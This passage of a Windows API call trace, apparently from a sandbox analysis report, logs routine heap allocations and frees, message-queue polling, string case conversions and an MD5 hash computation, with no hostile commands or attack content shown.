[0264.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.571] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.572] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.572] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0264.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.572] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0264.572] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0264.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0264.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0264.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0264.572] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0264.573] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.573] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0264.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0264.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0264.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0264.573] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0264.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0264.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0264.574] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0264.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0264.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0264.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0264.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0264.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0264.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0264.574] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0264.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0264.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0264.575] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.575] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0264.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0264.575] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0264.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0264.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0264.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0264.576] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0264.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0264.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0264.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0264.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0264.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0264.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0264.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0264.576] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0264.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0264.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0264.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0264.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.577] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0264.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0264.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0264.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0264.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0264.577] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.577] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0264.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0264.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0264.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0264.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0264.578] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.578] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.578] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0264.578] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.578] CryptHashData (hHash=0xaa57a0, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0264.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0264.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0264.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0264.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0264.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0264.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0264.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0264.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0264.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0264.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0264.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0264.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0264.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0264.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0264.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0264.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0264.582] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0264.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0264.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0264.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.582] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0264.582] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.583] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0264.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.583] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0264.583] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0264.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0264.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.583] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0264.584] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0264.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0264.585] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0264.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0264.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.585] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0264.585] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0264.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0264.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0264.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0264.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0264.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.586] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: 